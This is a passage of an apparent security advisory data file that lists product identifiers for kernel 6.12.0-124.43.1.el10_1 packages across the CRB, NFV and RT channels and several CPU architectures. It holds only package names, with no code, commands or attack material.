"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
